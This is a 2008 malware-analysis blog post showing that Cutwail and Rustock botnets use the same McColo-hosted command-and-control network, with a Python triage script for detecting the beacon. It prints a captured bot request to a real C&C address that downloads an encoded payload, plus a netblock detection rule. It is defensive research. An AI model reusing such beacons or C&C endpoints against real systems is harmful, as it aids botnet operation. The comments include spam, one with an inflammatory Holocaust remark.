Cutwail and Rustock/Costrat: Same Command-and-Control Network
September 24th, 2008 — bjou
Yesterday I posted an analysis of Cutwail. Today, while analyzing a Rustock/Costrat binary, I found something interesting:
Cutwail issued the following HTTP request to 208.66.194.232:80 (hosted by McColo, a provider known for hosting nefarious stuff):
GET /40E80010484449525657494F5357594C49584F456C000000066600000000760000046BEB000530CDE1E7ED HTTP/1.0
and received the following answer from the web server:
HTTP/1.0 200 OK
Date: Fri, 29 Aug 2008 18:21:44 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch9
Last-Modified: Fri, 29 Aug 2008 18:21:44 GMT
Cache-Control: no-cache
Content-Length: 326160
Connection: close
Content-Type: application/octet-stream
followed by an encrypted/encoded binary. I have not yet been able to examine that file, but I can provide it to interested readers on request. The Rustock/Costrat binaries connect to the same network; Rustock's connections to 208.66.194.0/24 are confirmed by Symantec and ThreatExpert reports.
Yet another piece of evidence that the top spam botnets are linked in certain ways, this time through shared command-and-control infrastructure.
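As an added triage example (not code from the original post), the script below checks HTTP sessions for the three traits of the beacon shown above: a request path that is one long run of hexadecimal digits, a destination inside the 208.66.194.0/24 netblock named in the post, and an application/octet-stream reply served with Cache-Control: no-cache. It also decodes the hex path and pulls out printable ASCII runs, the same first look one would take with strings. The session record format, the 32-hex-digit length threshold and the two benign sessions are assumptions constructed for this example; the first session reproduces the request and response headers from the post.

```python
"""Triage helper for the Cutwail/Rustock beacon pattern described in the post.

Flags an HTTP session when:
  * the request path is one long run of hexadecimal digits,
  * the destination sits in the netblock cited in the post (208.66.194.0/24),
  * the reply is application/octet-stream served with Cache-Control: no-cache.
Session record format and the sample sessions below are constructed for this example.
"""
import ipaddress
import re
import string

SUSPECT_NETBLOCK = ipaddress.ip_network("208.66.194.0/24")  # netblock cited in the post
# 32 hex digits (16 bytes) is an assumed threshold; tune it to your own traffic.
HEX_PATH_RE = re.compile(r"/([0-9A-Fa-f]{32,})/?")
PRINTABLE = set(string.printable) - set("\t\n\r\x0b\x0c")


def parse_request_line(line):
    """Split 'GET /path HTTP/1.0' into (method, path, version); ValueError if malformed."""
    parts = line.strip().split(" ")
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):
        raise ValueError("not an HTTP request line: %r" % line)
    return parts[0], parts[1], parts[2]


def hex_path_component(path):
    """Return the hex payload when the whole path is a long hex string, else None."""
    m = HEX_PATH_RE.fullmatch(path)
    return m.group(1) if m else None


def printable_runs(data, min_len=4):
    """Recover runs of printable ASCII from decoded bytes (a strings-style look at the beacon)."""
    runs, cur = [], ""
    for b in data:
        if b < 128 and chr(b) in PRINTABLE:
            cur += chr(b)
        else:
            if len(cur) >= min_len:
                runs.append(cur)
            cur = ""
    if len(cur) >= min_len:
        runs.append(cur)
    return runs


def in_suspect_netblock(ip):
    """True when the destination address falls inside the netblock from the post."""
    return ipaddress.ip_address(ip) in SUSPECT_NETBLOCK


def triage_session(session):
    """Return the list of reasons a session resembles the observed C&C fetch (empty if none)."""
    reasons = []
    _, path, _ = parse_request_line(session["request"])
    hexpart = hex_path_component(path)
    if hexpart is not None:
        reasons.append("hex-encoded path (%d bytes)" % (len(hexpart) // 2))
    if in_suspect_netblock(session["dst"]):
        reasons.append("destination in %s" % SUSPECT_NETBLOCK)
    hdrs = {k.lower(): v for k, v in session["headers"].items()}
    if hdrs.get("content-type") == "application/octet-stream" and hdrs.get("cache-control") == "no-cache":
        reasons.append("binary body served with no-cache")
    return reasons


def triage_all(sessions):
    """Map session index -> reasons; sessions that trigger nothing are omitted."""
    result = {}
    for i, s in enumerate(sessions):
        reasons = triage_session(s)
        if reasons:
            result[i] = reasons
    return result


# Constructed sessions: the first reproduces the request/response shown in the post,
# the other two are benign fillers (RFC 5737 documentation addresses).
PAGE_PATH_HEX = "40E80010484449525657494F5357594C49584F456C000000066600000000760000046BEB000530CDE1E7ED"
SAMPLE_SESSIONS = [
    {"dst": "208.66.194.232", "request": "GET /" + PAGE_PATH_HEX + " HTTP/1.0",
     "headers": {"Content-Type": "application/octet-stream", "Cache-Control": "no-cache",
                 "Content-Length": "326160"}},
    {"dst": "192.0.2.10", "request": "GET /index.html HTTP/1.1",
     "headers": {"Content-Type": "text/html", "Content-Length": "1024"}},
    {"dst": "192.0.2.20", "request": "GET /deadbeef HTTP/1.1",  # short hex, below threshold
     "headers": {"Content-Type": "image/png"}},
]

if __name__ == "__main__":
    for i, reasons in triage_all(SAMPLE_SESSIONS).items():
        s = SAMPLE_SESSIONS[i]
        print("session %d -> %s: %s" % (i, s["dst"], "; ".join(reasons)))
        hexpart = hex_path_component(parse_request_line(s["request"])[1])
        if hexpart:
            print("  printable runs in decoded path:", printable_runs(bytes.fromhex(hexpart)))
```

Only the first session trips all three checks. Decoding the path from the post yields a single printable run, the 17-character string starting at byte offset 4, which is the kind of identifier a bot embeds in a beacon; the surrounding bytes are not ASCII, so this script does not attempt to interpret the rest of the structure.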
October 3rd, 2008 at 6:39 pm
Hi Björn!
Try this webpage as well:
http://anubis.iseclab.org/
They do the same as Symantec and ThreatExpert but provide more details on the filesystem, registry or process activities.
Note: The section “General Information” does not show the system behavior caused by your binary only. It is a general view on the system.
Downloading the file from the webserver mentioned above brings this result:
http://anubis.iseclab.org/result.php?taskid=f39a0f6ee6d65b34298a46b7b683414c&refresh=1
Seems to be inoperable in this format. (encoded)
Perhaps you have an already decoded version to analyze.
Best wishes …
Florian
November 16th, 2011 at 2:44 am
I just wanted to type a small remark to appreciate you for the awesome recommendations you are posting here. My rather long internet research has now been compensated with excellent facts and techniques to write about with my pals. I'd declare that many of us visitors actually are unquestionably endowed to be in a remarkable site with so many marvellous individuals with beneficial things. I feel really happy to have come across your entire web page and look forward to plenty of more enjoyable times reading here. Thank you once more for all the details.
December 2nd, 2011 at 2:09 pm
Hi, I'll be so bold as to post something on your website. It all looks quite reasonable, actually! At the moment I'm also working on the topic of my own WordPress blog, but I'm still looking for a suitable theme and browsing a few WordPress blogs where I might find something suitable as inspiration! Regards, Mario
December 15th, 2011 at 8:44 pm
Just need to say your web site is striking. The clearness within of your established up is merely magnificent and i can consider on for granted you may well be an skilled on this field. Nicely with each other together with your permission permit me to grab your rss feed to preserve as a lot as evening with forthcoming publish. give cheers for you a million bucks and be sure you preserve up the productive operate.
December 25th, 2011 at 9:58 pm
Thank you for sharing superb informations. Your web-site is so cool. I am impressed by the details that you have on this website. It reveals how nicely you perceive this subject. Bookmarked this web page, will come back for extra articles. You, my pal, ROCK! I found simply the information I already searched everywhere and just could not come across. What an ideal web-site.
January 5th, 2012 at 8:27 am
Who's disregarding the Holocaust? There is no other country besides Israel that is more obsessed with the Holocaust than the US. Why is it that the people who invoke the Holocaust the loudest themselves don't do self-reflection to see what all tragedies they have been imposing on others? best diablo 3 gold